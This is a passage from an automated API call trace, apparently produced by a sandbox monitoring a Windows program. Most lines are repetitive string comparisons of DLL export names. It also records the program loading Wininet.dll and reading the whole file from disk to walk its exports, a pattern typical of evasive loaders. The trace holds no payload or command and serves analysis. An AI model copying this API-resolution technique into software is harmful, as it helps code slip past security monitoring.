(lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0236.070] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0236.071] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0236.071] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0236.071] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0236.071] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.071] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0236.072] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0236.072] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0236.073] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0236.073] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0236.074] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0236.075] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0237.758] GetProcessHeap () returned 0x430000 [0237.758] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45cc90 | out: hHeap=0x430000) returned 1 [0237.761] GetProcessHeap () returned 0x430000 [0237.761] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4499c0 [0237.762] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0237.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0237.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0237.967] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0237.967] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0237.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0237.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0237.967] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0237.967] GetProcessHeap () returned 0x430000 [0237.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x286600) returned 0x4057040 [0237.976] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0237.976] ReadFile (in: hFile=0x140, lpBuffer=0x4057040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4057040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0238.821] CloseHandle (hObject=0x140) returned 1 [0238.822] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0238.822] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0238.822] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0238.822] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0238.822] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0238.822] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0238.823] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0238.824] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0238.825] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0238.826] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0238.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0238.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0238.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0238.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", 